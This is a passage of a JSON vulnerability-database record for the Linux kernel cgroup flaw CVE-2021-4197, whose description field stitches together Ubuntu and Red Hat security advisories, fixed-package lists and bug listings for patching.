        "id": "VHN-410862"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-019487"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-4197"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An unprivileged write to the file handler flaw in the Linux kernel\u0027s control groups and namespaces subsystem was found in the way users have access to some less privileged process that are controlled by cgroups and have higher privileged parent process. It is actually both for cgroup2 and cgroup1 versions of control groups. A local user could use this flaw to crash the system or escalate their privileges on the system. Linux Kernel There is an authentication vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Attackers can use this vulnerability to bypass the restrictions of the Linux kernel through Cgroup Fd Writing to elevate their privileges. ==========================================================================\nUbuntu Security Notice USN-5368-1\nApril 06, 2022\n\nlinux-azure-5.13, linux-oracle-5.13 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-azure-5.13: Linux kernel for Microsoft Azure cloud systems\n- linux-oracle-5.13: Linux kernel for Oracle Cloud systems\n\nDetails:\n\nIt was discovered that the BPF verifier in the Linux kernel did not\nproperly restrict pointer types in certain situations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2022-1055)\n\nYiqi Sun and Kevin Wang discovered that the cgroups implementation in the\nLinux kernel did not properly restrict access to the cgroups v1\nrelease_agent feature. (CVE-2022-0492)\n\nJ\\xfcrgen Gro\\xdf discovered that the Xen subsystem within the Linux kernel did\nnot adequately limit the number of events driver domains (unprivileged PV\nbackends) could send to other guest VMs. An attacker in a driver domain\ncould use this to cause a denial of service in other guest VMs. \n(CVE-2021-28711, CVE-2021-28712, CVE-2021-28713)\n\nJ\\xfcrgen Gro\\xdf discovered that the Xen network backend driver in the Linux\nkernel did not adequately limit the amount of queued packets when a guest\ndid not process them. An attacker in a guest VM can use this to cause a\ndenial of service (excessive kernel memory consumption) in the network\nbackend domain. (CVE-2021-28714, CVE-2021-28715)\n\nSzymon Heidrich discovered that the USB Gadget subsystem in the Linux\nkernel did not properly restrict the size of control requests for certain\ngadget types, leading to possible out of bounds reads or writes. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2021-39698)\n\nIt was discovered that the simulated networking device driver for the Linux\nkernel did not properly initialize memory in certain situations. A local\nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2021-4135)\n\nEric Biederman discovered that the cgroup process migration implementation\nin the Linux kernel did not perform permission checks correctly in some\nsituations. (CVE-2021-4197)\n\nBrendan Dolan-Gavitt discovered that the aQuantia AQtion Ethernet device\ndriver in the Linux kernel did not properly validate meta-data coming from\nthe device. A local attacker who can control an emulated device can use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2021-43975)\n\nIt was discovered that the ARM Trusted Execution Environment (TEE)\nsubsystem in the Linux kernel contained a race condition leading to a use-\nafter-free vulnerability. A local attacker could use this to cause a denial\nof service or possibly execute arbitrary code. (CVE-2021-44733)\n\nIt was discovered that the Phone Network protocol (PhoNet) implementation\nin the Linux kernel did not properly perform reference counting in some\nerror conditions. A local attacker could possibly use this to cause a\ndenial of service (memory exhaustion). (CVE-2021-45095)\n\nIt was discovered that the eBPF verifier in the Linux kernel did not\nproperly perform bounds checking on mov32 operations. A local attacker\ncould use this to expose sensitive information (kernel pointer addresses). \n(CVE-2021-45402)\n\nIt was discovered that the Reliable Datagram Sockets (RDS) protocol\nimplementation in the Linux kernel did not properly deallocate memory in\nsome error conditions. A local attacker could possibly use this to cause a\ndenial of service (memory exhaustion). (CVE-2021-45480)\n\nIt was discovered that the BPF subsystem in the Linux kernel did not\nproperly track pointer types on atomic fetch operations in some situations. \nA local attacker could use this to expose sensitive information (kernel\npointer addresses). (CVE-2022-0264)\n\nIt was discovered that the TIPC Protocol implementation in the Linux kernel\ndid not properly initialize memory in some situations. A local attacker\ncould use this to expose sensitive information (kernel memory). \n(CVE-2022-0382)\n\nSamuel Page discovered that the Transparent Inter-Process Communication\n(TIPC) protocol implementation in the Linux kernel contained a stack-based\nbuffer overflow. A remote attacker could use this to cause a denial of\nservice (system crash) for systems that have a TIPC bearer configured. \n(CVE-2022-0435)\n\nIt was discovered that the KVM implementation for s390 systems in the Linux\nkernel did not properly prevent memory operations on PVM guests that were\nin non-protected mode. A local attacker could use this to obtain\nunauthorized memory write access. (CVE-2022-0516)\n\nIt was discovered that the ICMPv6 implementation in the Linux kernel did\nnot properly deallocate memory in certain situations. A remote attacker\ncould possibly use this to cause a denial of service (memory exhaustion). \n(CVE-2022-0742)\n\nIt was discovered that the IPsec implementation in the Linux kernel did not\nproperly allocate enough memory when performing ESP transformations,\nleading to a heap-based buffer overflow. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2022-27666)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n  linux-image-5.13.0-1021-azure   5.13.0-1021.24~20.04.1\n  linux-image-5.13.0-1025-oracle  5.13.0-1025.30~20.04.1\n  linux-image-azure               5.13.0.1021.24~20.04.10\n  linux-image-oracle              5.13.0.1025.30~20.04.1\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://ubuntu.com/security/notices/USN-5368-1\n  CVE-2021-28711, CVE-2021-28712, CVE-2021-28713, CVE-2021-28714,\n  CVE-2021-28715, CVE-2021-39685, CVE-2021-39698, CVE-2021-4135,\n  CVE-2021-4197, CVE-2021-43975, CVE-2021-44733, CVE-2021-45095,\n  CVE-2021-45402, CVE-2021-45480, CVE-2022-0264, CVE-2022-0382,\n  CVE-2022-0435, CVE-2022-0492, CVE-2022-0516, CVE-2022-0742,\n  CVE-2022-1055, CVE-2022-23222, CVE-2022-27666\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-azure-5.13/5.13.0-1021.24~20.04.1\n  https://launchpad.net/ubuntu/+source/linux-oracle-5.13/5.13.0-1025.30~20.04.1\n\n. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.4.5 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. \nSee the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/\n\nSecurity fixes:\n\n* golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)\n\n* nconf: Prototype pollution in memory store (CVE-2022-21803)\n\n* golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n(CVE-2022-23806)\n\n* nats-server: misusing the \"dynamically provisioned sandbox accounts\"\nfeature authenticated user can obtain the privileges of the System account\n(CVE-2022-24450)\n\n* Moment.js: Path traversal in moment.locale (CVE-2022-24785)\n\n* dset: Prototype Pollution in dset (CVE-2022-25645)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* go-getter: writes SSH credentials into logfile, exposing sensitive\ncredentials to local uses (CVE-2022-29810)\n\nBug fixes:\n\n* Trying to create a new cluster on vSphere and no feedback, stuck in\n\"creating\" (BZ# 1937078)\n\n* Wrong message is displayed when GRC fails to connect to an Ansible Tower\n(BZ# 2051752)\n\n* multicluster_operators_hub_subscription issues due to /tmp usage (BZ#\n2052702)\n\n* Create Cluster, Worker Pool 2 zones do not load options that relate to\nthe selected Region field (BZ# 2054954)\n\n* Changing the multiclusterhub name other than the default name keeps the\nversion in the web console loading (BZ# 2059822)\n\n* search-redisgraph-0 generating massive amount of logs after 2.4.2 upgrade\n(BZ# 2065318)\n\n* Uninstall pod crashed when destroying Azure Gov cluster in ACM (BZ#\n2073562)\n\n* Deprovisioned clusters not filtered out by discovery controller (BZ#\n2075594)\n\n* When deleting a secret for a Helm application, duplicate errors show up\nin topology (BZ# 2075675)\n\n* Changing existing placement rules does not change YAML file Regression\n(BZ# 2075724)\n\n* Editing Helm Argo Applications does not Prune Old Resources (BZ# 2079906)\n\n* Failed to delete the requested resource [404] error appears after\nsubscription is deleted and its placement rule is used in the second\nsubscription (BZ# 2080713)\n\n* Typo in the logs when Deployable is updated in the subscription namespace\n(BZ# 2080960)\n\n* After Argo App Sets are created in an Upgraded Environment, the Clusters\ncolumn does not indicate the clusters (BZ# 2080716)\n\n* RHACM 2.4.5 images (BZ# 2081438)\n\n* Performance issue to get secret in claim-controller (BZ# 2081908)\n\n* Failed to provision openshift 4.10 on bare metal (BZ# 2094109)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n1937078 - Trying to create a new cluster on vSphere and no feedback, stuck in \"creating\"\n2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic\n2051752 - Wrong message is displayed when GRC fails to connect to an ansible tower\n2052573 - CVE-2022-24450 nats-server: misusing the \"dynamically provisioned sandbox accounts\" feature  authenticated user can obtain the privileges of the System account\n2052702 - multicluster_operators_hub_subscription issues due to /tmp usage\n2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n2054954 - Create Cluster, Worker Pool 2 zones do not load options that relate to the selected Region field\n2059822 - Changing the multiclusterhub name other than the default name keeps the version in the web console loading. \n2065318 - search-redisgraph-0 generating massive amount of logs after 2.4.2 upgrade\n2072009 - CVE-2022-24785 Moment.js: Path traversal  in moment.locale\n2073562 - Uninstall pod crashed when destroying Azure Gov cluster in ACM\n2074689 - CVE-2022-21803 nconf: Prototype pollution in memory store\n2075594 - Deprovisioned clusters not filtered out by discovery controller\n2075675 - When deleting a secret for a Helm application, duplicate errors show up in topology\n2075724 - Changing existing placement rules does not change YAML file\n2079906 - Editing Helm Argo Applications does not Prune Old Resources\n2080279 - CVE-2022-29810 go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses\n2080713 - Failed to delete the requested resource [404] error appears after subscription is deleted and it\u0027s placement rule is used in the second subscription [Upgrade]\n2080716 - After Argo App Sets are created in an Upgraded Environment, the Clusters column does not indicate the clusters\n2080847 - CVE-2022-25645 dset: Prototype Pollution in dset\n2080960 - Typo in the logs when Deployable is updated in the subscription namespace\n2081438 - RHACM 2.4.5 images\n2081908 - Performance issue to get secret in claim-controller\n2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group\n2094109 - Failed to provision openshift 4.10 on bare metal\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2022:5626-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:5626\nIssue date:        2022-07-19\nCVE Names:         CVE-2020-29368 CVE-2021-4197 CVE-2021-4203 \n                   CVE-2022-1012 CVE-2022-1729 CVE-2022-32250 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 8.4\nExtended Update Support. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat CodeReady Linux Builder EUS (v. 8.4) - aarch64, ppc64le, x86_64\nRed Hat Enterprise Linux BaseOS EUS (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. \n\nSecurity Fix(es):\n\n* kernel: Small table perturb size in the TCP source port generation\nalgorithm can lead to information leak (CVE-2022-1012)\n\n* kernel: race condition in perf_event_open leads to privilege escalation\n(CVE-2022-1729)\n\n* kernel: a use-after-free write in the netfilter subsystem can lead to\nprivilege escalation to root (CVE-2022-32250)\n\n* kernel: cgroup: Use open-time creds and namespace for migration perm\nchecks (CVE-2021-4197)\n\n* kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses\n(CVE-2021-4203)\n\n* kernel: the copy-on-write implementation can grant unintended write\naccess because of a race condition in a THP mapcount check (CVE-2020-29368)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* Failed to reboot after crash trigger (BZ#2060747)\n\n* conntrack entries linger around after test (BZ#2066357)\n\n* Enable nested virtualization (BZ#2079070)\n\n* slub corruption during  LPM of hnv interface (BZ#2081251)\n\n* sleeping function called from invalid context at\nkernel/locking/spinlock_rt.c:35 (BZ#2082091)\n\n* Backport request of \"genirq: use rcu in kstat_irqs_usr()\" (BZ#2083309)\n\n* ethtool -L may cause system to hang (BZ#2083323)\n\n* For isolated CPUs (with nohz_full enabled for isolated CPUs) CPU\nutilization statistics are not getting reflected continuously (BZ#2084139)\n\n* Affinity broken due to vector space exhaustion (BZ#2084647)\n\n* kernel memory leak while freeing nested actions (BZ#2086597)\n\n* sync rhel-8.6 with upstream 5.13 through 5.16 fixes and improvements\n(BZ#2088037)\n\n* Kernel panic possibly when cleaning namespace on pod deletion\n(BZ#2089539)\n\n* Softirq hrtimers are being placed on the per-CPU softirq clocks on\nisolcpu\u2019s. (BZ#2090485)\n\n* fix missed wake-ups in rq_qos_throttle try two (BZ#2092076)\n\n* NFS4 client experiencing IO outages while sending duplicate SYNs and\nerroneous RSTs during connection reestablishment (BZ#2094334)\n\n* using __this_cpu_read() in preemptible [00000000] code:\nkworker/u66:1/937154 (BZ#2095775)\n\n* Need some changes in RHEL8.x kernels. (BZ#2096932)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check\n2035652 - CVE-2021-4197 kernel: cgroup: Use open-time creds and namespace for migration perm checks\n2036934 - CVE-2021-4203 kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses\n2064604 - CVE-2022-1012 kernel: Small table perturb size in the TCP source port generation algorithm can lead to information leak\n2086753 - CVE-2022-1729 kernel: race condition in perf_event_open leads to privilege escalation\n2092427 - CVE-2022-32250 kernel: a use-after-free write in the netfilter subsystem can lead to privilege escalation to root\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS EUS (v.8.4):\n\nSource:\nkernel-4.18.0-305.57.1.el8_4.src.rpm\n\naarch64:\nbpftool-4.18.0-305.57.1.el8_4.aarch64.rpm\nbpftool-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-core-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-cross-headers-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-debug-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-debug-core-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-debug-devel-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-debug-modules-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-debug-modules-extra-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-devel-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-headers-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-modules-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-modules-extra-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-tools-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-tools-libs-4.18.0-305.57.1.el8_4.aarch64.rpm\nperf-4.18.0-305.57.1.el8_4.aarch64.rpm\nperf-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm\npython3-perf-4.18.0-305.57.1.el8_4.aarch64.rpm\npython3-perf-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm\n\nnoarch:\nkernel-abi-stablelists-4.18.0-305.57.1.el8_4.noarch.rpm\nkernel-doc-4.18.0-305.57.1.el8_4.noarch.rpm\n\nppc64le:\nbpftool-4.18.0-305.57.1.el8_4.ppc64le.rpm\nbpftool-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-core-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-cross-headers-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-debug-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-debug-core-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-debug-devel-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-debug-modules-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-debug-modules-extra-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-devel-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-headers-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-modules-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-modules-extra-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-tools-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-tools-libs-4.18.0-305.57.1.el8_4.ppc64le.rpm\nperf-4.18.0-305.57.1.el8_4.ppc64le.rpm\nperf-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm\npython3-perf-4.18.0-305.57.1.el8_4.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm\n\ns390x:\nbpftool-4.18.0-305.57.1.el8_4.s390x.rpm\nbpftool-debuginfo-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-core-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-cross-headers-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-debug-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-debug-core-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-debug-debuginfo-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-debug-devel-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-debug-modules-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-debug-modules-extra-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-debuginfo-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-debuginfo-common-s390x-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-devel-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-headers-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-modules-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-modules-extra-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-tools-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-tools-debuginfo-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-zfcpdump-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-zfcpdump-core-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-zfcpdump-debuginfo-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-zfcpdump-devel-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-zfcpdump-modules-4.18.0-305.57.1.el8_4.s390x.rpm\nkernel-zfcpdump-modules-extra-4.18.0-305.57.1.el8_4.s390x.rpm\nperf-4.18.0-305.57.1.el8_4.s390x.rpm\nperf-debuginfo-4.18.0-305.57.1.el8_4.s390x.rpm\npython3-perf-4.18.0-305.57.1.el8_4.s390x.rpm\npython3-perf-debuginfo-4.18.0-305.57.1.el8_4.s390x.rpm\n\nx86_64:\nbpftool-4.18.0-305.57.1.el8_4.x86_64.rpm\nbpftool-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-core-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-cross-headers-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-debug-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-debug-core-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-debug-devel-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-debug-modules-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-debug-modules-extra-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-devel-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-headers-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-modules-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-modules-extra-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-tools-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-tools-libs-4.18.0-305.57.1.el8_4.x86_64.rpm\nperf-4.18.0-305.57.1.el8_4.x86_64.rpm\nperf-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm\npython3-perf-4.18.0-305.57.1.el8_4.x86_64.rpm\npython3-perf-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm\n\nRed Hat CodeReady Linux Builder EUS (v. 8.4):\n\naarch64:\nbpftool-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm\nkernel-tools-libs-devel-4.18.0-305.57.1.el8_4.aarch64.rpm\nperf-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm\npython3-perf-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm\n\nppc64le:\nbpftool-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm\nkernel-tools-libs-devel-4.18.0-305.57.1.el8_4.ppc64le.rpm\nperf-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm\nkernel-tools-libs-devel-4.18.0-305.57.1.el8_4.x86_64.rpm\nperf-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm\npython3-perf-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYuFkSdzjgjWX9erEAQhDCxAAknsy8K3eg1J603gMndUGWfI/Fs5VzIaH\nlxGavTw8H57lXRWbQYqJoRKk42uHAH2iCicovyvowJ5SdfnChtAVbG1A1wjJLmJJ\n0YDKoeMn3s1jjThivm5rWGQVdImqLw+CxVvb3Pywv6ZswTI5r4ZB4FEXW8GIR1w2\n1FeHTcwUgNLzeBLdVem1T50lWERG0j0ZGUmv9mu4QMDeWXoSoPcHKWnsmLgDvQif\ndVky3UsFoCJ783WJOIctmY97kOffqIDvZdbPwajAyTByspumtcwt6N7wMU6VfI+u\nB6bRGQgLbElY6IniLUsV7MG8GbbffZvPFNN/n6LdnnFgEt1eDlo6LkZCyPaMbEfx\n2dMxJtcAiXmydMs5QXvNJ3y2UR2fp/iHF8euAnSN3eKTLAxDQwo3c4KvNUKAfFcF\nOAjbyLTilLhiPHRARG4aEWCEUSmfzO3rulNhRcIEWtNIira3/QMFG9qUjNAMvzU1\nM4tMSPkH35gx49p2a6arZceUGDXiRwvrP142GzpAgRWt/GrydjAsRiG4pJM2H5TW\nnB5q7OuwEvch8+o8gJril5uOpm6eI1lylv9wTXbwjpzQqL5k2JcgByRWx8wLqYXy\nwXsBm+JZL9ztSadqoVsFWSqC0yeRkuF185F4gI7+7azjpeQhHtJEix3bgqRhIzK4\n07JERnC1IRg=\n=y1sh\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.7.2 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes\n2038898 - [UI] ?Update Repository? option not getting disabled after adding the Replication Repository details to the MTC web console\n2040693 - ?Replication repository? wizard has no validation for name length\n2040695 - [MTC UI] ?Add Cluster? wizard stucks when the cluster name length is more than 63 characters\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2048537 - Exposed route host to image registry? connecting successfully to invalid registry ?xyz.com?\n2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak\n2055658 - [MTC UI] Cancel button on ?Migrations? page does not disappear when migration gets Failed/Succeeded with warnings\n2056962 - [MTC UI] UI shows the wrong migration type info after changing the target namespace\n2058172 - [MTC UI] Successful Rollback is not showing the green success icon in the ?Last State? field. \n2058529 - [MTC UI] Migrations Plan is missing the type for the state migration performed before upgrade\n2061335 - [MTC UI] ?Update cluster? button is not getting disabled\n2062266 - MTC UI does not display logs properly [OADP-BL]\n2062862 - [MTC UI] Clusters page behaving unexpectedly on deleting the remote cluster?s service account secret from backend\n2074675 - HPAs of DeploymentConfigs are not being updated when migration from Openshift 3.x to Openshift 4.x\n2076593 - Velero pod log missing from UI  drop down\n2076599 - Velero pod log missing from downloaded logs folder [OADP-BL]\n2078459 - [MTC UI] Storageclass conversion plan is adding migstorage reference in migplan\n2079252 - [MTC]  Rsync options logs not visible in log-reader pod\n2082221 - Don\u0027t allow Storage class conversion migration if source cluster has only one storage class defined [UI]\n2082225 - non-numeric user when launching stage pods [OADP-BL]\n2088022 - Default CPU requests on Velero/Restic are too demanding making scheduling fail in certain environments\n2088026 - Cloud propagation phase in migration controller is not doing anything due to missing labels on Velero pods\n2089126 - [MTC] Migration controller cannot find Velero Pod because of wrong labels\n2089411 - [MTC] Log reader pod is missing velero and restic pod logs [OADP-BL]\n2089859 - [Crane] DPA CR is missing the required flag - Migration is getting failed at the EnsureCloudSecretPropagated phase due to the missing secret VolumeMounts\n2090317 - [MTC] mig-operator failed to create a DPA CR due to null values are passed instead of int [OADP-BL]\n2096939 - Fix legacy operator.yml inconsistencies and errors\n2100486 - [MTC UI] Target storage class field is not getting respected when clusters don\u0027t have replication repo configured. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.9.45. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHBA-2022:5878\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these 